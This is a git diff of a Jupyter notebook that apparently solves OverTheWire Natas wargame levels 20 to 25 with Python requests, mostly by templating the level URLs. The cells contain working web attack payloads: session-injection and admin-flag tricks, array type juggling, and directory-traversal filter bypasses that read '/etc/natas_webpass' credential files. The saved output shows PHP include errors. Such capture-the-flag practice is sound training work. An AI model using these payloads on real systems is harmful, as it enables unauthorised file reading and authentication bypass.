--- a/Natas/natas.ipynb
+++ b/Natas/natas.ipynb
@@ -1251,7 +1251,7 @@
     "natas = f'natas{count}'\n",
     "\n",
     "while 'natas21' not in pwd:\n",
-    "    url = f'http://natas20.natas.labs.overthewire.org/index.php?debug=1'\n",
+    "    url = f'http://natas{count}.natas.labs.overthewire.org/index.php?debug=1'\n",
     "    cookies = dict(PHPSESSID='key')\n",
     "    params = dict(name='admin\\nadmin 1')\n",
     "    result = requests.get(url, auth=(natas, pwd[natas]), cookies=cookies, params=params)\n",
@@ -1298,11 +1298,11 @@
     "get_pwd()\n",
     "natas = f'natas{count}'\n",
     "\n",
-    "url = 'http://natas21-experimenter.natas.labs.overthewire.org/index.php?submit=1&admin=1&bgcolor=blue&debug=1'\n",
+    "url = f'http://natas{count}-experimenter.natas.labs.overthewire.org/index.php?submit=1&admin=1&bgcolor=blue&debug=1'\n",
     "res = requests.get(url, auth=(natas, pwd[natas]))\n",
     "\n",
     "cookies = dict(PHPSESSID=res.cookies.get('PHPSESSID'))\n",
-    "url = f'http://natas21.natas.labs.overthewire.org/index.php'\n",
+    "url = f'http://natas{count}.natas.labs.overthewire.org/index.php'\n",
     "result = requests.get(url, auth=(natas, pwd[natas]), cookies=cookies)\n",
     "\n",
     "find_pwd(result)"
@@ -1345,7 +1345,7 @@
     "get_pwd()\n",
     "natas = f'natas{count}'\n",
     "\n",
-    "url = f'http://natas22.natas.labs.overthewire.org'\n",
+    "url = f'http://natas{count}.natas.labs.overthewire.org'\n",
     "cookies = dict(PHPSESSID='1')\n",
     "params = dict(revelio=1)\n",
     "result = requests.get(url, auth=(natas, pwd[natas]), cookies=cookies, params=params, allow_redirects=False)\n",
@@ -1390,7 +1390,7 @@
     "get_pwd()\n",
     "natas = f'natas{count}'\n",
     "\n",
-    "url = f'http://natas23.natas.labs.overthewire.org/?passwd=11iloveyou'\n",
+    "url = f'http://natas{count}.natas.labs.overthewire.org/?passwd=11iloveyou'\n",
     "res = requests.get(url, auth=(natas, pwd[natas]))\n",
     "\n",
     "find_pwd(res)"
@@ -1463,7 +1463,7 @@
     "\n",
     "passwd = ''\n",
     "\n",
-    "url = f'http://natas24.natas.labs.overthewire.org?passwd[]={passwd}'\n",
+    "url = f'http://natas{count}.natas.labs.overthewire.org?passwd[]={passwd}'\n",
     "result = requests.get(url, auth=(natas, pwd[natas]))\n",
     "print(result.text)\n",
     "\n",
@@ -1479,7 +1479,7 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 33,
+   "execution_count": 73,
    "metadata": {},
    "outputs": [
     {
@@ -1508,6 +1508,21 @@
       "</form>\n",
       "</div>\n",
       "\n",
+      "<br />\n",
+      "<b>Warning</b>:  include(/etc): failed to open stream: No such file or directory in <b>/var/www/natas/natas25/index.php</b> on line <b>38</b><br />\n",
+      "<br />\n",
+      "<b>Warning</b>:  include(): Failed opening 'language/../../../../../etc/' for inclusion (include_path='.:/usr/share/php') in <b>/var/www/natas/natas25/index.php</b> on line <b>38</b><br />\n",
+      "<br />\n",
+      "<b>Notice</b>:  Undefined variable: __GREETING in <b>/var/www/natas/natas25/index.php</b> on line <b>80</b><br />\n",
+      "<h2></h2><br />\n",
+      "<b>Notice</b>:  Undefined variable: __MSG in <b>/var/www/natas/natas25/index.php</b> on line <b>81</b><br />\n",
+      "<p align=\"justify\"><br />\n",
+      "<b>Notice</b>:  Undefined variable: __FOOTER in <b>/var/www/natas/natas25/index.php</b> on line <b>82</b><br />\n",
+      "<div align=\"right\"><h6></h6><div><p>\n",
+      "<div id=\"viewsource\"><a href=\"index-source.html\">View sourcecode</a></div>\n",
+      "</div>\n",
+      "</body>\n",
+      "</html>\n",
       "\n"
      ]
     }
@@ -1519,16 +1534,23 @@
     "get_pwd()\n",
     "natas = f'natas{count}'\n",
     "\n",
-    "lang = '....//var/www/natas/natas25/logs/natas25_dsdatf2a8nrrl30ffhc25cnp95.log'\n",
-    "lang = '....//etc/natas_webpass/natas26'\n",
+    "lang = '....//....//....//....//....//var/www/natas/natas25/logs/natas25_dsdatf2a8nrrl30ffhc25cnp95.log'\n",
+    "lang = '....//....//....//....//....//etc/'\n",
     "\n",
-    "url = f'http://natas25.natas.labs.overthewire.org'\n",
+    "url = f'http://natas{count}.natas.labs.overthewire.org'\n",
     "params = dict(lang=lang)\n",
     "result = requests.get(url, auth=(natas, pwd[natas]), params=params)\n",
     "print(result.text)\n",
     "\n",
     "# find_pwd(result)"
    ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": []
   }
  ],
  "metadata": {
